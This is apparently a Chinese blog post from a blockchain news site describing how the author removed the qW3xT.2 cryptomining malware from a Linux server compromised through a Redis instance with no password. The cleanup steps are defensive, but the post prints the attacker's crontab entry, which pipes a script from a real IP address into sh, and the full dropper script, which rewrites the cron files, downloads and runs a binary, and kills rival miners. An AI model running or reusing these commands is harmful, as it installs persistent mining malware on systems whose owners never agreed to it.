找回密码
 立即注册
  • QQ空间
  • 回复
  • 收藏

Linux 下qW3xT.2,解决挖矿病毒

币看世界| 2018-10-12 00:16 阅读 1032 评论 1

早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。

Linux 下qW3xT.2,解决挖矿病毒


在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。

解决办法:

1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis

2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3xT.2该进程,但是一段时间之后,发现该行程又重新启动。

肯定是有守护进程,观察top命令下的进程,发现一个可疑的进行

Linux 下qW3xT.2,解决挖矿病毒


3、在/tmp文件夹下发现该进程的文件 ls /tmp

发现qW3xT.2文件又重新生成了。这时,首先删除qW3xT.2文件和ddgs.3013文件,然后使用top查询qW3xT.2和ddgs.3013的pid,直接kill掉。

4、一段时间之后,删除的文件重新生成,dds和挖矿的进程又重新执行。此时怀疑是否有计划任务,此时查看计划任务的列表
[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -l*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh[root@iZbp1cbg04oh74k1dexpujZ tmp]# crontab -r //删除计划任务

curl 的这几个 optional 介绍,我也是百度的

-f - fail在HTTP错误(H)上静默失败(根本没有输出)

-s -silent静音模式。 不要输出任何东西

–socks4 HOST [:PORT]给定主机+端口上的SOCKS4代理

–socks4a HOST [:PORT]给定主机+端口上的SOCKS4a代理

–socks5 HOST [:PORT]给定主机+端口上的SOCKS5代理

–socks5-hostname HOST [:PORT] SOCKS5代理,将主机名传递给代理

–socks5-gssapi-service名称为gssapi的SOCKS5代理服务名称

–socks5-gssapi-nec与NEC SOCKS5服务器的兼容性

-S –show-error显示错误。 使用-s时,make curl会在出现错误时显示错误

-L –location遵循重定向(H)

–location-trusted like –location并将auth发送给其他主机(H)

此时计划任务已经删除。详细信息查看https://juejin.im/post/5b62b975f265da0f9628a820。

计划任务删除完成之后,这个13又开始运行。太顽固了。

于是我又看计划任务的内容,是否是有东西没有删除干净。
[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.shexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/crontabs/rootecho "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013if [ ! -f "/tmp/ddgs.3013" ]; then curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013fichmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs killps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs killps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs killps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs killps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill发现计划任务在服务器中创建了几个文件,/var/spool/cron/crontabs/root/var/spool/cron/root内容是*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh。(与计划任务相同)将计划任务中创建的文件删除。

最终,这个挖矿病毒终于删除完成

本文仅代表作者个人观点,不代表巨推链平台发声,对文章观点有疑义请先联系作者本人进行修改,若内容非法请联系平台管理员,邮箱cxb5918@163.com。更多区块链资讯,请到百万区块链发烧友聚集平台巨推链www.jutuilian.com学习区块链技术请到巨推学院www.jutuiedu.com
  • 卜静 2018-10-12 00:23
    我也遇到过,跟你的情况类似[捂脸]
文章点评
2018-12-17 13:53
数字币 小时候人手一台的四驱车,名字你能叫得上几部?(上)
冲锋战神。直线速度快,绝技是龙卷风音速战神。过弯速度快胜利冲锋。冲锋战神的下一代 <详情>
2018-12-17 13:50
数字币 什么是GUSD?即将崛起的稳定币GUSD
一、什么是GUSD?在稳定币的赛道上,USDT一直有种寡头趋势,一家独大,几乎垄断整个法 <详情>
2018-12-17 13:47
数字币 羊驼英雄榜大咖分享会之李书沸——战略全球
驼哥开场(文字):各位驼友,大家好!这里是银河系最有趣的区块链媒体羊驼区块链组织 <详情>
2018-12-17 13:22
业界 P2P出借人,别再二次被骗了,这些情况你遇见过吗?
2018年下半年以来,很多P2P平台出了问题,那些真正地因为项目逾期而无法按时兑付的P2P <详情>
2018-12-17 13:21
应用 区块链每日摘要(2018年12月15日)
欢迎点赞并关注小编,获取当天环球区块链及区块链最新要闻。下面给大家带来12月15日区 <详情>
2018-12-17 13:21
数字币 花费18万软妹币的求婚轰动大广州,这个婚是怎么求的?
今年夏天,一场求婚轰动了大广州,单单求个婚,一个小伙花了18万软妹币天哪,我和我的 <详情>
2018-12-17 13:12
业界 扒皮归零币消费链CDC,杨宁骗完钱还好意思说冤?黑庄:关我P事!
免责声明:本文不构成任何投资建议。小编:记得关注哦!拔吊无情,甩锅“黑庄”,曾经 <详情>
2018-12-17 13:05
应用 硬核技术:证券型通证需要专属的区块链吗?|八维资本
技术视角:证券型通证需要专属的区块链吗?Should There Be a Blockchain for Security <详情>
2018-12-17 13:03
应用 于佩尔自曝是很懒的人:剧本就读一次 不会去做笔记
伊莎贝尔-于佩尔亮相首届海南岛国际电影节中国企业新闻观察网娱乐讯(三丁/文 玄反影/ <详情>
2018-12-17 12:53
币圈 比特币破3W了 那些高呼区块链革命的人,还在吗?
最近两周,整个加密数字货币市场疯狂下跌。在有人喊出比特币跌破3W,我直播吃翔后,比 <详情>
2018-12-17 12:45
业界 PPP项目,大工程、融资骗局汇总,你是否遇见过?
【PPP项目,大工程、融资骗局汇总】1、首先要先甄别介绍人。如是无工作、无单位、无职 <详情>
2018-12-17 12:44
+场景 金融与政务:10月区块链应用场景集中这两头
文丨互链脉搏·曹元未经授权,不得转载10月,区块链“加密货币”市场不温不火,但区块 <详情>
2018-12-17 12:38
业界 火币落地澳大利亚,国际化进程提速
火币集团在3月30日宣布,火币集团与澳大利亚Blockchain Global公司签订战略合作协议, <详情>
2018-12-17 12:38
业界 别被忽悠了!诈骗老套路正在穿上区块链新“马甲”!
一场区块链风暴正在席卷中国:食品安全、证据保存、金融交易、公益互助...这些复杂的 <详情>
2018-12-17 12:35
创投 2018年国务院大督查来了!非法集资金融诈骗遭严打
点击上方“交易场所日报”关注更多行业动态交易场所日报 · 一类网信资质的媒体,全国 <详情>
2018-12-17 12:29
政策 重磅!央行数字货币即将面世,主导机关已与多地政府秘密合作?
央行数字货币将要面世了。根据上海证券报报道,在成功开发法定数字货币原型后,中国人 <详情>
2018-12-17 12:23
访谈 区块链及时信息八则(2018.12.14)
1.【福建省区块链协会发布2019-2020“区块链+”行动计划】 在首届区块链产业与企业家 <详情>
2018-12-17 12:19
数字币 关于otc市场,作为股民朋友的你要知道的几个问题!
自从改革开放以来,我国的金融市场取得了极大的发展。一方面,源于我国政策的正确指引 <详情>
2018-12-17 12:19
数字币 网传北京要求虚拟币交易平台今起停止新用户注册
9月15日,比特币行情在上一日大跌有所反弹后再度开启下跌行情。火币网行情数据显示, <详情>
2018-12-17 12:09
数字币 农村老人常说:"猪来穷,狗来富,猫来头上顶白布",是什么意思?
当你遇到一件事,感觉无法解决,甚至已经影响到你生活和心情时,何不停下脚步,多些思 <详情>